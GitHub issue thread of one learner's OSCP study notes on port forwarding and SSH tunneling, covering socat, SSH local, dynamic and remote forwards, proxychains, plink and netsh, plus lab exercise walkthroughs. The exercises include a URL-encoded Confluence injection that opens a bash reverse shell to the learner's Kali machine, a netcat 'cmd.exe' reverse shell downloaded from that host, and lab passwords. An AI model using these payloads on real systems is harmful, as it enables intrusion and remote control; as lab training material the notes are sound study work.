search

WDavid404 / OSCP

0 stars 0 forks source link

18. Port Redirection and SSH Tunneling #19

Open WDavid404 opened 9 months ago

WDavid404 commented 9 months ago

18.2. Port Forwarding with Linux Tools

WDavid404 commented 9 months ago

https://ameblo.jp/bakery-diary/entry-12618175162.html

ip route

コマンド実行結果例の2行目を例に、番号順に内容を説明する。 ①172.17.0.0/16 ②dev eth1 ③proto kernel ④scope link ⑤src 172.17.0.1

番号/キー(あれば) 意味
宛先ネットワーク。
②/dev 宛先ネットワークに向かうために、どのネットワークインタフェース(NIC)から出発するか。
③/proto このルーティング情報がどのように生成されたか。値がkernerlなら、kernelが生成(ダイナミックルーティング)。値がstaticなら、手動作成(スタティックルーティング)。
④/scope 宛先ネットワークの種別。値がhostなら、自分自身が宛先。値がlinkなら、ローカルネットワークが宛先。値がgrobalまたはscope情報省略時は外部ネットワークが宛先。なお値がgrobalの時は、ネクストホップのルーター情報が、別途viaキーにて示される。(コマンド実行結果例の1つめ参照)
⑤/src 送信元IPアドレス。
WDavid404 commented 9 months ago

Socat port forwarding

如果target machine里没有安装socat,可以尝试下载安装它

1.

socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 --》 注意:fork和前面的逗号之前不能有空格

image

On Kali: connect to CONFLUENCE01 (-h 192.168.50.63) on port 2345 (-p 2345) with the postgres user account (-U postgres)

kali@kali:~$ psql -h 192.168.50.63 -p 2345 -U postgres
Password for user postgres: 
。。。

2.

socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22

image

On Kali

kali@kali:~$ ssh database_admin@192.168.50.63 -p2222

WDavid404 commented 9 months ago

18.3. SSH Tunneling

18.3.1. SSH Local Port Forwarding

On CONFLUENCE01 machine

ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 The -N flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.

image image image

On kali

kali@kali:~$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234

image

kali@kali:~$ smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

image
WDavid404 commented 9 months ago

18.3.2. SSH Dynamic Port Forwarding

Local port forwarding has one glaring limitation: we can only connect to one socket per SSH connection. This can make it quite tedious to use at scale. Luckily, OpenSSH also provides dynamic port forwarding. From a single listening port on the SSH client, packets can be forwarded to any socket that the SSH server host has access to.

SSH dynamic port forwarding works because the listening port that the SSH client creates is a SOCKS proxy server port. SOCKS is a proxying protoco.

confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
.....

we'll want to use smbclient again. However, we find that smbclient doesn't natively provide an option to use a SOCKS proxy. Without a native option to use a SOCKS proxy in smbclient, we can't take advantage of our dynamic port forward. The SOCKS proxy can't determine how to handle traffic that isn't encapsulated in the SOCKS protocol format.

To use smbclient in this situation, we'll leverage Proxychains. Proxychains is a tool that can force network traffic from third party tools over HTTP or SOCKS proxies. As the name suggests, it can also be configured to push traffic over a chain of concurrent proxies.

Proxychains uses a configuration file for almost everything, stored by default at /etc/proxychains4.conf. By default, proxies are defined at the end of the file. We can simply replace any existing proxy definition in that file with a single line defining the proxy type, IP address, and port of the SOCKS proxy running on CONFLUENCE01 (socks5 192.168.50.63 9999).

kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 192.168.50.63 9999

The Proxychains configuration file, pointing towards the SOCKS proxy set up on CONFLUENCE01.

kali@kali:~$ proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217

WDavid404 commented 9 months ago

18.3.3. SSH Remote Port Forwarding

-L and -D port forwarding is more challenge in the real world because of firewalls - both hardware and software. Inbound traffic is often controlled much more aggressively than outbound traffic.

image

Step:

  1. On kali machine

kali@kali:~$ sudo systemctl start ssh Note: In order to connect back to the Kali SSH server using a username and password you may have to explicity allow password-based authentication by setting PasswordAuthentication to yes in /etc/ssh/sshd_config (注意是 sshd_config, 而不是ssh_config) grep 'PasswordAuthentication ' /etc/ssh/sshd_config image

kali@kali:~$ sudo ss -ntplu

image
  1. On CONFLUENCE01 machine 
    
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 .....



3. On kali machine
`kali@kali:~$ ss -ntplu`
<img width="615" alt="image" src="https://github.com/WDavid404/OSCP/assets/137129330/bb14ba14-4575-45c1-8ef8-5f4497642e64">

`kali@kali:~$ psql -h 127.0.0.1 -p 2345 -U postgres
`
<img width="664" alt="image" src="https://github.com/WDavid404/OSCP/assets/137129330/c1624b91-cd45-40e1-b906-dd56a828e808">
WDavid404 commented 9 months ago

18.3.4. SSH Remote Dynamic Port Forwarding

On CONFLUENCE01 machine

confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -R 9998 kali@192.168.118.4

On kaili sudo ss -ntplu

image

kali@kali:~$ tail /etc/proxychains4.conf

image

kali@kali:~$ proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64

18.3.5. Using sshuttle

sshuttle is a tool that turns an SSH connection into something similar to a VPN by setting up local routes that force traffic through the SSH tunnel. However, it requires root privileges on the SSH client and Python3 on the SSH server, so it's not always the most lightweight option. In the appropriate scenario, however, it can be very useful.

WDavid404 commented 9 months ago

18.4. Port Forwarding with Windows Tools

18.4.1. ssh.exe

On Windows versions with SSH installed, we will find scp.exe, sftp.exe, ssh.exe, along with other ssh-* utilities in %systemdrive%\Windows\System32\OpenSSH location by default.

  1. On Kali kali@kali:~$ sudo systemctl start ssh
    RDP to connect with Windows machine kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64

  2. On Windows machine:

    
C:\Users\rdp_admin>where ssh
C:\Users\rdp_admin>ssh.exe -V
### If  the version of OpenSSH bundled with Windows is higher than 7.6, meaning we can use it for remote dynamic port forwarding.

C:\Users\rdp_admin>ssh -N -R 9998 kali@192.168.118.4


3. On Kali

`kali@kali:~$ ss -ntplu
`

kali@kali:~$ tail /etc/proxychains4.conf
... [ProxyList]

add proxy here ...

meanwile

defaults set to "tor"

socks5 127.0.0.1 9998

`kali@kali:~$ proxychains psql -h 10.4.50.215 -U postgres
`
## 18.4.2. Plink
Before OpenSSH was so readily available on Windows, most network administrators' tools of choice were PuTTY and its command-line-only counterpart, Plink

To download nc.exe onto MULTISERVER03 (Windows machine), we first need to host it on a server that MULTISERVER03 can access. We can easily configure Apache2 on our Kali machine to do this. Apache2 is installed by default on Kali, so we just need to start the apache2 service.
`kali@kali:~$ sudo systemctl start apache2
`

kali@kali:~$ find / -name nc.exe 2>/dev/null /usr/share/windows-resources/binaries/nc.exe

kali@kali:~$ sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/


On Windows machine: 
`powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe`

`C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
`

We now want to download Plink to MULTISERVER03. 
On our Kali machine, we can copy plink.exe from windows-resources/binaries to the Apache2 web root.

kali@kali:~$ find / -name plink.exe 2>/dev/null /usr/share/windows-resources/binaries/plink.exe

kali@kali:~$ sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/


On Windows

c:\windows\system32\inetsrv>powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

C:\Windows\Temp\plink.exe

c:\windows\system32\inetsrv>

c:\windows\system32\inetsrv>C:\Windows\Temp\plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4



On Kali
`kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833`
WDavid404 commented 9 months ago

18.4. Port Forwarding with Windows Tools

18.4.3. Netsh

the built-in firewall configuration tool Netsh) (also known as Network Shell). Using Netsh, we can set up a port forward with the portproxy subcontext within the interface context

The portproxy subcontext of the netsh interface command requires administrative privileges to make any changes. This means that in most cases we will need to take UAC into account. In this example, we're running it in a shell over RDP using an account with administrator privileges, so UAC is not a concern. However, we should bear in mind that UAC may be a stumbling block in other setups.

image

kali@kali:~$ xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64

On Windows We'll instruct netsh interface to add a portproxy rule from an IPv4 listener that is forwarded to an IPv4 port (v4tov4). This will listen on port 2222 on the external-facing interface (listenport=2222 listenaddress=192.168.50.64) and forward packets to port 22 on PGDATABASE01 (connectport=22 connectaddress=10.4.50.215). Run cmd.exe as administrator to open a command window.

C:\Windows\system32>netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

C:\Windows\system32>

Although we don't receive any output from the command, we can confirm that port 2222 is listening using netstat.

C:\Windows\system32>netstat -anp TCP | find "2222"
  TCP    192.168.50.64:2222     0.0.0.0:0              LISTENING
C:\Windows\system32>netsh interface portproxy show all

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.50.64   2222        10.4.50.215     22

On Kali kali@kali:~$ sudo nmap -sS 192.168.50.64 -Pn -n -p2222 The response shows that port 2222 is filtered. It's most likely that the Windows Firewall is blocking inbound connections to port 2222.

image

We'll allow connections on the local port (localport=2222) on the interface with the local IP address (localip=192.168.50.64) using the TCP protocol, specifically for incoming traffic (dir=in).

C:\Windows\system32> netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow
Ok.

On Kali kali@kali:~$ ssh database_admin@192.168.50.64 -p2222

To delete firewall rule

C:\Users\Administrator>netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

Deleted 1 rule(s).
Ok.

To delete proxy rule

C:\Windows\Administrator> netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

C:\Windows\Administrator>
WDavid404 commented 8 months ago

Questions

18.3.1 Q2

172.16.233.217- HRSHARES 
10.4.233.215 - PGDATABASE01 - database_admin/sqlpass123
192.168.233.63 - CONFLUENCE01

192.168.45.203 - Kali

  1. on Kali curl http://192.168.233.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.203/4444%200%3E%261%27%29.start%28%29%22%29%7D/ -->nc -vlp 4444 will get reverse shell from CONFLUENCE01

  2. 
confluence@confluence01:/opt/atlassian/confluence/bin$ ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
   valid_lft forever preferred_lft forever
4: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:86:c2:5e brd ff:ff:ff:ff:ff:ff
inet 192.168.233.63/24 brd 192.168.233.255 scope global ens192
   valid_lft forever preferred_lft forever
5: ens224: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:86:dc:50 brd ff:ff:ff:ff:ff:ff
inet 10.4.233.63/24 brd 10.4.233.255 scope global ens224
   valid_lft forever preferred_lft forever
3. must !!

python3 -c 'import pty; pty.spawn("/bin/bash")'

![image](https://github.com/WDavid404/OSCP/assets/137129330/1477d9ee-b9f9-40ae-b2fd-3e912eb73721)

4. setup a local port forwarding on CONFLUENCE01

confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -L 0.0.0.0:4455:172.16.233.217:445 database_admin@10.4.233.215 confluence@confluence01:/opt/atlassian/confluence/bin$ ssh -N -L 0.0.0.0:4242:172.16.233.217:4242 database_admin@10.4.233.215 <242:172.16.233.217:4242 database_admin@10.4.233.215
Could not create directory '/home/confluence/.ssh'. The authenticity of host '10.4.233.215 (10.4.233.215)' can't be established. ECDSA key fingerprint is SHA256:GMUxFQSTWYtQRwUc9UvG2+8toeDPtRv3sjPyMfmrOH4. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes yes Failed to add the host to the list of known hosts (/home/confluence/.ssh/known_hosts). database_admin@10.4.233.215's password: sqlpass123


!!Note:  If you don't execute the following command,
`python3 -c 'import pty; pty.spawn("/bin/bash")'`
you will encounter the issue below when trying the ssh local port forwarding.

Could not create directory '/home/confluence/.ssh'. Host key verification failed.


5. Download ./ssh_local_client file
6.  chmod a+x ./ssh_local_client   --> If you don't do it, run .\./ssh_local_client will get an error msg as below.

└─$ ./ssh_local_client
zsh: permission denied: ./ssh_local_client



7. /ssh_local_client -i 192.168.233.63 -p 4242  ---> Get flag!
WDavid404 commented 7 months ago

18.3.2 Q2

  1. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  2. python3 -c 'import pty; pty.spawn("/bin/bash")'

  3. ssh -N -D 0.0.0.0:4455 database_admin@10.4.233.215

  4. On kali, edit '/etc/proxychains4.conf ' as below image

  5. On Kali, download ssh_dynamic_client file

  6. chmod a+x ./ssh_dynamic_client

  7. proxychains nmap -sT < HRSHARES IP> ---------> According to 18.3.2 Q1, port 4872 is open

  8. proxychains ./ssh_dynamic_client -i < HRSHARES IP> -p 4872

WDavid404 commented 7 months ago

18.3.2 Q3

10.4.236.215 - PGDATABASE01
192.168.236.63 - CONFLUENCE01
192.168.45.224 -- Kali

  1. On kali, sudo systemctl start ssh

  2. Edit and make sure kali ssh allow username/password authentication grep 'PasswordAuthentication ' /etc/ssh/sshd_config image

  3. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  4. python3 -c 'import pty; pty.spawn("/bin/bash")'

  5. ssh -N -R 127.0.0.1:4455:10.4.236.215:4444 kali@192.168.45.224

  6. On Kali, check if the ssh remote tunnel has been established. image

  7. Download ssh_remote_client

  8. chmod a+x ssh_remote_client

  9. .\ssh_remote_client -i 127.0.0.1 -p4455

WDavid404 commented 7 months ago

18.3.2 Q4

10.4.236.215 - PGDATABASE01
192.168.236.63 - CONFLUENCE01 
192.168.236.64 - MULTISERVER03 --> Internal IP: 10.4.236.64
192.168.45.224 -- Kali

  1. On kali, sudo systemctl start ssh

  2. On kali, edit '/etc/proxychains4.conf ' as below image

  3. Same as 18.3.1 Q2, get reverse shell from CONFLUENCE01

  4. python3 -c 'import pty; pty.spawn("/bin/bash")'

  5. ssh -N -R 9999 kali@192.168.45.224

  6. On kali, check if the tunnel has been established by sudo ss -ntplu image

  7. On Kali, download ssh_remote_dynamic_client

  8. chmod a+x ssh_remote_dynamic_client

  9. proxychains .\ssh_remote_dynamic_client -i 10.4.236.64 -p 9062 (port 9062 is open according to 18.3.4 Q1)

WDavid404 commented 7 months ago

18.4.1 Q1

192.168.196.64  - MULTISERVER03 
10.4.196.215 - PGDATABASE01 

192.168.45.236 - Kali

  1. RDP login to MULTISERVER03: xfreerdp /u:rdp_admin /p:'P@ssw0rd!' /f +fonts +clipboard /v:192.168.196.64 /h:400 /w:600

  2. ssh -N -R 8899 kali@192.168.45.236

  3. On kali, confirm that ssh is runing (ps -a|grep ssh) and 8899 port tunnel is established. image

  4. make sure /etc/proxychains4.conf is as below image

  5. Download ssh_exe_exercise_client.bin file and execute 'chmod a+x' for it

  6. proxychains ./ssh_exe_exercise_client.bin -i 10.4.196.215 -p 4141

18.4.2 Q2

192.168.193.64 - MULTISERVER03 
10.4.193.215 - PGDATABASE01

192.168.45.203 - Kali
  1. RDP login to MULTISERVER03: xfreerdp /u:rdp_admin /p:'P@ssw0rd!' /f +fonts +clipboard /v:192.168.193.64 /h:400 /w:600
  2. Add portproxy: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.193.64 (--> MULTISERVER03's IP) connectport=4545 connectaddress=10.4.193.215

you can confirm it bynetsh interface portproxy show all

  1. Add FW allow rule: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.45.203(MULTISERVER03's IP) localport=2222 action=allow image

  2. On kali, confirm port 2222 is open on MULTISERVER03 image

  3. Download netsh_exercise_client.bin file and chmod a+x for it.

  4. ./netsh_exercise_client.bin -i 192.168.193.64 -p 2222